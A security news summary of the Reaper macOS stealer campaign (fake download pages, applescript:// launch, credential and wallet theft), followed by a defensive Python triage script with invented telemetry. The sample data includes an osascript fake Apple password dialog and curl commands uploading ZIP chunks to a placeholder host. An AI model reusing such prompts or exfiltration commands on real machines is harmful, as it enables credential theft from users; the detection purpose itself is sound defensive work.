Researchers reported a macOS malware campaign distributing an updated SHub Stealer variant, dubbed Reaper, through fake download pages impersonating trusted software such as WeChat and Miro. The infection chain uses an automated ClickFix-style technique that avoids Terminal paste protections in macOS by opening the built-in Script Editor through an applescript:// link with malicious code already loaded, requiring only a single user action to run. The malware then presents a fake Apple security update prompt to capture the victim’s password while using typo-squatted domains and brand impersonation to make the attack appear legitimate.
Once executed, Reaper steals documents, browser credentials from Chrome, Firefox, Brave, Edge, and Opera, along with Keychain and iCloud-related data, Telegram sessions, and cryptocurrency wallet information. It exfiltrates files in chunked ZIP archives to attacker-controlled infrastructure, including via curl, modifies legitimate desktop crypto wallet applications to redirect future funds, and establishes persistence through a fake Google Software Update service. Researchers also said the malware checks for a Russian keyboard layout and exits if detected, and noted that this is the third observed automated ClickFix-style macOS campaign in less than two months, indicating the technique is gaining traction among macOS threat actors.
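As an added illustration (not code from this page or from the researchers it summarizes), the script below turns the behaviours described above into defensive triage heuristics and runs them over constructed endpoint telemetry: a browser handing an applescript:// URL to Script Editor, an osascript password dialog styled as an Apple update, repeated curl uploads of ZIP chunks to a single host, and a LaunchAgent that presents itself as Google Software Update but points outside Google's install directory. The record layout, field names, host names, paths and label strings are all assumptions made up for the example, and the "genuine Google path" check is a heuristic rather than a documented rule.

```python
"""Triage heuristics for the macOS stealer chain described above.

Constructed example: every record in SAMPLE_EVENTS is made up for this
demonstration and is not an indicator from the Reaper/SHub campaign.
"""
import re
from collections import Counter
from typing import Dict, List

# Assumption: genuine Google updater components live under this directory
# (system-wide or under ~/Library); a look-alike installed elsewhere is suspect.
GENUINE_GOOGLE_UPDATE_DIR = "/Library/Google/GoogleSoftwareUpdate/"

# curl upload forms (-F name=@file, -T file, --upload-file, --data-binary @file)
# where the uploaded object is a .zip archive.
UPLOAD_RE = re.compile(
    r"(?:-F\s+\S+=@|-T\s+|--upload-file\s+|--data-binary\s+@)(\S+\.zip)\b", re.I
)
HOST_RE = re.compile(r"https?://([^/\s]+)")

# Constructed telemetry. Record kinds: url_open (URL handed to a scheme
# handler), process (process start with command line), launchagent (plist
# written to a LaunchAgents directory).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"kind": "process", "process": "Safari",
     "cmdline": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"kind": "url_open", "scheme": "applescript", "handler": "Script Editor",
     "referrer": "Safari"},
    {"kind": "process", "process": "osascript",
     "cmdline": "osascript -e 'display dialog \"Apple Security Update requires "
                "your password\" default answer \"\" with hidden answer'"},
    {"kind": "process", "process": "curl",
     "cmdline": "curl -F file=@/tmp/part_001.zip https://updates.example-placeholder.invalid/upload"},
    {"kind": "process", "process": "curl",
     "cmdline": "curl -F file=@/tmp/part_002.zip https://updates.example-placeholder.invalid/upload"},
    {"kind": "launchagent", "label": "com.google.GoogleSoftwareUpdate",
     "program": "/Users/alice/Library/Application Support/.gsu/GoogleSoftwareUpdate"},
    {"kind": "launchagent", "label": "com.example.benign",
     "program": "/Applications/Benign.app/Contents/MacOS/helper"},
    {"kind": "process", "process": "curl",
     "cmdline": "curl -sL https://example.org/index.html -o /tmp/page.html"},
]


def triage(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per matched heuristic, in event order, followed by
    an aggregate finding for hosts that received two or more ZIP uploads."""
    findings: List[Dict[str, str]] = []
    uploads_per_host: Counter = Counter()

    for ev in events:
        kind = ev.get("kind")
        if kind == "url_open":
            # applescript:// handed to Script Editor from a browser: the
            # ClickFix-style launch path described in the story.
            if (ev.get("scheme", "").lower() == "applescript"
                    and "script editor" in ev.get("handler", "").lower()):
                findings.append({"rule": "applescript-url-handler",
                                 "detail": f"{ev.get('referrer', '?')} opened "
                                           f"{ev['handler']} via applescript://"})
        elif kind == "process":
            proc, cmd = ev.get("process", ""), ev.get("cmdline", "")
            # Hidden-answer dialog invoking Apple/update wording: credential
            # prompt masquerading as a system update.
            if (proc == "osascript" and "display dialog" in cmd
                    and "hidden answer" in cmd
                    and re.search(r"apple|update", cmd, re.I)):
                findings.append({"rule": "password-prompt-dialog", "detail": cmd})
            if proc == "curl":
                up, host = UPLOAD_RE.search(cmd), HOST_RE.search(cmd)
                if up and host:
                    uploads_per_host[host.group(1)] += 1
                    findings.append({"rule": "curl-zip-upload",
                                     "detail": f"{up.group(1)} -> {host.group(1)}"})
        elif kind == "launchagent":
            label, program = ev.get("label", "").lower(), ev.get("program", "")
            looks_like_google_update = (("google" in label and "update" in label)
                                        or "googlesoftwareupdate" in program.lower())
            if looks_like_google_update and GENUINE_GOOGLE_UPDATE_DIR not in program:
                findings.append({"rule": "fake-google-update-persistence",
                                 "detail": f"{ev.get('label')} -> {program}"})

    # Chunked archives to one destination are the exfiltration pattern described.
    for host, n in uploads_per_host.items():
        if n >= 2:
            findings.append({"rule": "chunked-exfil",
                             "detail": f"{n} ZIP uploads to {host}"})
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings per rule, for a quick triage summary."""
    return dict(Counter(f["rule"] for f in findings))


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['detail']}")
    print(summarize(triage(SAMPLE_EVENTS)))
```

Feeding real telemetry only requires mapping your EDR or unified-log export onto the three record kinds; the benign Safari, curl download and LaunchAgent records in the sample are there to show that the rules key on the combination of behaviours rather than on the process names alone.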

Researchers at Moonlock reported a macOS malware campaign distributing an updated SHub Stealer variant called Reaper through fake software download pages impersonating brands such as WeChat and Miro. The campaign uses an automated ClickFix-style infection chain that opens Script Editor with preloaded malicious code, then steals browser data, documents, passwords, and cryptocurrency wallet information while establishing persistence.
Sources: cybersecuritynews.com, hackread.com